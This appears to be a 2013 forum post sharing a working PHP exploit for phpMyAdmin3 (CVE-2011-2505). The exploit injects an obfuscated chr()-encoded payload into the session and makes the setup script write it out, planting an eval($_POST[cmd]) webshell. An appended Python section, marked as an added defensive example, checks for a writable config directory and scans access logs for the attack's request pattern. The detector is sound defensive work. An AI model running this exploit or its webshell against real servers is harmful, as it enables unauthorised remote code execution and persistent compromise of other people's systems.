phpMyAdmin3 remote code execution exploit, PHP version

Original poster, posted 2013-2-21 09:13:03
I've been a full-time stay-at-home dad lately, out of touch with the scene for many months, and the blog hasn't been updated either.

Last night I was up all night with the kid and saw 黑哥's discussion of the phpMyAdmin3 vulnerability in the php security group. I hadn't read the vulnerable code before, though a while back I did see wofeiwo's exp on Weibo; 黑哥 said there was a way to exploit it that isn't jilei (chicken ribs), so overnight I dug out the code, studied it and wrote this reheated exp. Since I got to it late and many people had already studied it and written exps, mine is just reheating leftovers, research to pass the time.

First, props to wofeiwo's Python version of the exp, and props to the research spirit of wofeiwo and superhei, role models to learn from. The earlier exp, though, has a few restrictions when used:
first, session.auto_start = 1;
second, in the default pma3 code the libraries directory is already blocked by .htaccess and cannot be accessed.
And of course a third point, the gulf nobody can get across: the config directory must exist and be writable.

After reading 黑哥's remarks in the group and looking at the code again, I found that the first two restrictions can both be ignored. So this vulnerability really doesn't have to be so jilei.

So I wrote this PHP version of the exp; the code follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr = php_request('config/');
if (strpos($returnstr, '404')) {
    exit("[-] Exploit Failed! The directory:config does not exist!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result = php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token     = isset($resp[3]) ? $resp[3] : '';
$sessionid = isset($resp[1]) ? $resp[1] : '';
if ($token && $sessionid) {
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
} else {
    exit("[-] Can't get token and Session ID, Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 * The chr() sequence is the session payload; once the setup script writes the
 * session into config/config.inc.php, it creates config/a.php (see the final echo).
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net', '', 'phpMyAdmin='.$sessionid);
// Actually, almost all the php files in the home directory of pma3 can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php', 'phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save', 'phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content = php_request('config/config.inc.php');
if (strpos($content, 't00ls')) {
    echo "[+] Congratulations! Exploit successful....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
} else {
    exit("[-] Exploit Failed! Perhaps the directory:config does not exist or is not writeable!\n");
}

/**
 * Minimal raw HTTP client: GET when $data is empty, POST otherwise.
 **/
function php_request($url, $data = '', $cookie = '') {
    global $host, $path;

    $method = $data ? 'POST' : 'GET';

    $packet  = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data ? "Content-Type: application/x-www-form-urlencoded\r\n" : "";
    $packet .= $data ? "Content-Length: ".strlen($data)."\r\n" : "";
    $packet .= $cookie ? "Cookie: $cookie\r\n" : "";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data ? $data : "";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    fclose($fp);
    return $resp;
}

?>
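A defender-side companion to the post above. Of the three restrictions oldjun lists, only the writable config directory is a real precondition, and the exploit's own steps show the request sequence an attack leaves in the web server log. This is an added example, not code from oldjun's post or from phpMyAdmin: it assumes a local phpMyAdmin install path and Apache/nginx combined-format access logs, and the log lines and the temporary directory it builds are constructed sample data. check_config_dir() reports whether a config/ directory is present and writable (the post-setup state the post names as the one hard precondition), and scan_access_log() flags the request shapes the exploit sends: a session_to_unset parameter combined with an _SESSION[...] query key, a POST to setup/config.php, and a fetch of config/config.inc.php.

```python
"""
Added defender-side example (not part of the original post or of phpMyAdmin).
  check_config_dir(root)  - is pma's "config/" directory present and writable?
  scan_access_log(lines)  - flag access-log lines matching the exploit's request shapes.
All paths and log lines below are constructed sample data.
"""
import os
import re
import tempfile
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format, reduced to the fields we need (assumed log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log: one benign request, three attack-shaped ones, one benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/index.php HTTP/1.1" 200 5120',
    '10.0.0.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/db_create.php?token=abc&session_to_unset=x&_SESSION[ConfigFile][Servers][0][host]=evil HTTP/1.1" 200 310',
    '10.0.0.5 - - [21/Feb/2013:09:13:05 +0800] "POST /pma/setup/config.php HTTP/1.1" 303 0',
    '10.0.0.5 - - [21/Feb/2013:09:13:06 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 12',
    '10.0.0.9 - - [21/Feb/2013:09:20:00 +0800] "GET /pma/db_create.php?token=abc&db=test HTTP/1.1" 200 4000',
]


def check_config_dir(pma_root):
    """Describe the 'config/' precondition for a phpMyAdmin install rooted at pma_root."""
    cfg = os.path.join(pma_root, "config")
    exists = os.path.isdir(cfg)
    writable = exists and os.access(cfg, os.W_OK)
    # "exposed" is the state the exploit needs: directory present AND writable.
    return {"exists": exists, "writable": writable, "exposed": exists and writable}


def classify_request(method, target):
    """Return the reasons (possibly none) a request matches the CVE-2011-2505 pattern."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    keys = [unquote(k) for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    reasons = []
    # Step 3 of the exploit: session variable injection through the query string.
    if "session_to_unset" in keys and any(k.startswith("_SESSION[") for k in keys):
        reasons.append("session injection: _SESSION[...] key together with session_to_unset")
    # Step 4: asking the setup script to persist the session into config/config.inc.php.
    if method == "POST" and path.endswith("/setup/config.php"):
        reasons.append("POST to setup/config.php (writes config/config.inc.php)")
    # Step 5: fetching the generated config file, which executes its contents.
    if path.endswith("/config/config.inc.php"):
        reasons.append("direct fetch of config/config.inc.php")
    return reasons


def scan_access_log(lines):
    """Return (ip, method, target, reasons) for every log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip
        reasons = classify_request(m["method"], m["target"])
        if reasons:
            hits.append((m["ip"], m["method"], m["target"], reasons))
    return hits


def demo_config_check():
    """Run check_config_dir() against a constructed throwaway install tree."""
    root = tempfile.mkdtemp(prefix="pma_demo_")
    before = check_config_dir(root)          # no config/ directory yet
    os.mkdir(os.path.join(root, "config"))   # the post-setup state the exploit needs
    after = check_config_dir(root)
    return before, after


if __name__ == "__main__":
    before, after = demo_config_check()
    print("config/ absent  ->", before)
    print("config/ present ->", after)
    for ip, method, target, reasons in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {method} {target}")
        for r in reasons:
            print("    -", r)
```

The query-string check works on the raw request line, so it only sees what the server logs; the POST body sent to setup/config.php is not in the access log, which is why that step is matched on method and path alone. Removing the config/ directory after setup, as the post's third restriction implies, makes both the precondition check and the last two log patterns moot.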